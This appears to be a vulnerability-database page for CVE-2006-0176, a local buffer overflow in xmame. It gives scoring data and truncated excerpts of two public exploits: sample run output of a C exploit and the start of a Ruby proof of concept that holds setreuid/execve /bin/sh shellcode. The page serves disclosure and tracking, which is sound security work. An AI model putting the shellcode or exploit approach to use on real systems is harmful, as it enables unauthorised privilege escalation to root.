CVE-2006-0176
published 2006-01-11CVE-2006-0176: Buffer overflow in certain functions in src/fileio.c and src/unix/fileio.c in xmame before 11 January 2006 may allow local users to gain privileges via a long…
PriorityP427high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.01%
58.6th percentile
Buffer overflow in certain functions in src/fileio.c and src/unix/fileio.c in xmame before 11 January 2006 may allow local users to gain privileges via a long (1) -lang, (2) -ctrlr, (3) -pb, or (4) -rec argument on many operating systems, and via a long (5) -jdev argument on Ubuntu Linux.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xmame | xmame | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Xmame 0.102 - 'lang' Local Buffer Overflow
exploitdb·2006-01-13
CVE-2006-0176 Xmame 0.102 - 'lang' Local Buffer Overflow
Xmame 0.102 - 'lang' Local Buffer Overflow
---
/*
Xmame 0.102 (-lang) Local Buffer Overflow Exploit
Coded BY Qnix
[email protected]
#0x11 @EFNET
icq : 234263
0x11.org
Advisory : http://kerneltrap.org/node/6055
e.g:
Qnix ~ # ./exploit /usr/games/bin/xmame.x11
Xmame 0.102 (-lang) Local Buffer Overflow Exploit
Coded BY Qnix
(~) Stack pointer (ESP) : 0xbffff688
(~) Offset from ESP : 0x0
(~) Desired Return Addr : 0xbffff688
GLINFO: loaded OpenGL library libGL.so!
GLINFO: loaded GLU library libGLU.so!
GLINFO: glPolygonOffsetEXT (2): not implemented !
info: trying to parse: /usr/share/games/xmame/xmamerc
info: trying to parse: /root/.xmame/xmamerc
info: trying to parse: /usr/share/games/xmame/xmame-x11rc
info: trying to parse: /root/.xmame/xmame-x11rc
info: trying to parse: /usr/share/games/
Exploit-DB
Xmame 0.102 - '-lang' Local Buffer Overflow
exploitdb·2006-01-10
CVE-2006-0176 Xmame 0.102 - '-lang' Local Buffer Overflow
Xmame 0.102 - '-lang' Local Buffer Overflow
---
#!/usr/bin/ruby
#
# One of the PoC code for xmame "-lang" options.
# Advisory is base on : http://kerneltrap.org/node/6055
#
# by xwings at mysec dot org
# url : http://www.mysec.org , new website
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1)
# xmame 0.102 , ./configure && make && make install
#
#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes.
shellcode = "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+
"\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+
"\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+
"\x31\xdb\xcd\x80"
vulnpath = "/usr/games/xmame.x11"
argvopt = "-
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0353.htmlhttp://www.securityfocus.com/archive/1/421849/100/0/threadedhttp://www.securityfocus.com/bid/16203http://x.mame.net/changes-unix.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/24102http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0353.htmlhttp://www.securityfocus.com/archive/1/421849/100/0/threadedhttp://www.securityfocus.com/bid/16203http://x.mame.net/changes-unix.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/24102
2006-01-11
Published